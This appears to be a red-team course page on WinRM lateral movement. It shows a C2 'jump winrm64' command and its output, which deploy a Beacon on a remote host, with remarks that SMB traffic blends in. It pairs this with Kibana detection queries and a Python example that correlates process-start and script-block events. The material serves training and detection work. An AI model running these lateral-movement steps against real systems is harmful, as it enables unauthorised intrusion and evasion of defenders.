Windows Remote Management

The winrm and winrm64 methods are used for 32-bit and 64-bit targets respectively; pick the one that matches the architecture of the remote host.

The SMB Beacon is an excellent choice when moving laterally, because the SMB protocol is used extensively in a Windows environment, so this traffic blends in very well.

beacon> jump winrm64 web.dev.cyberbotic.io smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10) on web.dev.cyberbotic.io via WinRM
[+] host called home, sent: 225172 bytes
[+] established link to child beacon: 10.10.122.30

WinRM returns a high-integrity Beacon running in the context of the user you authenticated to the remote machine as.

This new Beacon will be running inside wsmprovhost.exe, the "Host process for WinRM plug-ins". This process is spawned whenever commands are executed over WinRM, whether the session is legitimate or not. You can search for its process start events, but this will produce a lot of false positives in environments where system administrators use WinRM (PowerShell Remoting) routinely.

event.category: process and event.type: start and process.name: wsmprovhost.exe

The most likely means of identifying this lateral movement is by searching PowerShell script block logs for known payload artefacts.

event.category: process and powershell.file.script_block_text: "$var_runme.Invoke([IntPtr]::Zero)"
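To show how the two queries above behave against real event shapes, and how to cut down the false positives from the wsmprovhost.exe process start search, here is an added example (not part of the original page or of the course material) that implements both queries in Python over ECS-style event documents and then correlates them per host. The sample events, host names and user names are constructed for illustration; the field names follow the ECS layout used by the Kibana queries. The correlation step goes beyond the page: a wsmprovhost.exe start is only surfaced when the same host also logged a script block containing a known payload artefact.

```python
"""Replay the WinRM detection queries from this page over sample ECS events.

Added example, not code from the original page. It implements the
process-start query and the script-block artefact query in Python, then
correlates the two per host so that a wsmprovhost.exe start only surfaces
when that host also logged a known payload artefact.
"""
from typing import Any, Iterable

# Known payload artefact from the page's script block query. Add further
# strings only once you have confirmed them in your own generated payloads.
PAYLOAD_ARTEFACTS = ("$var_runme.Invoke([IntPtr]::Zero)",)

# Constructed sample events (not real logs), shaped like ECS documents.
SAMPLE_EVENTS = [
    # Host "web": wsmprovhost.exe spawned by the WinRM service host, followed
    # by a script block carrying the Beacon loader artefact.
    {"event": {"category": "process", "type": "start"},
     "process": {"name": "wsmprovhost.exe", "parent": {"name": "svchost.exe"}},
     "host": {"name": "web"}, "user": {"name": "DEV\\nlamb"}},
    {"event": {"category": "process"},
     "powershell": {"file": {"script_block_text":
                             "# constructed loader tail\n$var_runme.Invoke([IntPtr]::Zero)"}},
     "host": {"name": "web"}, "user": {"name": "DEV\\nlamb"}},
    # Host "sql": an administrator's legitimate PowerShell Remoting session.
    {"event": {"category": "process", "type": "start"},
     "process": {"name": "wsmprovhost.exe", "parent": {"name": "svchost.exe"}},
     "host": {"name": "sql"}, "user": {"name": "DEV\\jadams"}},
    {"event": {"category": "process"},
     "powershell": {"file": {"script_block_text":
                             "Get-Service -Name MSSQLSERVER | Restart-Service"}},
     "host": {"name": "sql"}, "user": {"name": "DEV\\jadams"}},
    # Unrelated process start on "web"; must not match either query.
    {"event": {"category": "process", "type": "start"},
     "process": {"name": "notepad.exe", "parent": {"name": "explorer.exe"}},
     "host": {"name": "web"}, "user": {"name": "DEV\\nlamb"}},
]


def field(event: dict, path: str) -> Any:
    """Look up a dotted ECS field such as 'process.parent.name'; None if absent."""
    node: Any = event
    for part in path.split("."):
        if not isinstance(node, dict) or part not in node:
            return None
        node = node[part]
    return node


def wsmprovhost_starts(events: Iterable[dict]) -> list:
    """event.category: process and event.type: start and process.name: wsmprovhost.exe"""
    return [
        e for e in events
        if field(e, "event.category") == "process"
        and field(e, "event.type") == "start"
        and (field(e, "process.name") or "").lower() == "wsmprovhost.exe"
    ]


def script_block_hits(events: Iterable[dict], artefacts=PAYLOAD_ARTEFACTS) -> list:
    """event.category: process and powershell.file.script_block_text: "<artefact>"

    Kibana's quoted query is a phrase match on the analysed text field. A plain
    substring test is used here instead: stricter, and free of tokeniser
    surprises with characters such as '$', '[' and ']'.
    """
    hits = []
    for e in events:
        text = field(e, "powershell.file.script_block_text") or ""
        if field(e, "event.category") == "process" and any(a in text for a in artefacts):
            hits.append(e)
    return hits


def correlate_by_host(events: Iterable[dict]) -> list:
    """Hosts that both started wsmprovhost.exe and logged a payload artefact."""
    events = list(events)
    start_hosts = {field(e, "host.name") for e in wsmprovhost_starts(events)}
    block_hosts = {field(e, "host.name") for e in script_block_hits(events)}
    return sorted(start_hosts & block_hosts)


if __name__ == "__main__":
    print("wsmprovhost starts:", [field(e, "host.name") for e in wsmprovhost_starts(SAMPLE_EVENTS)])
    print("script block hits: ", [field(e, "host.name") for e in script_block_hits(SAMPLE_EVENTS)])
    print("correlated hosts:  ", correlate_by_host(SAMPLE_EVENTS))
```

The process start query alone flags both "web" and "sql", which is the false positive problem described above; the artefact query and the per-host correlation both narrow the result to "web". Note that script block logging (event ID 4104) must be enabled on the target for the second query to return anything at all.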
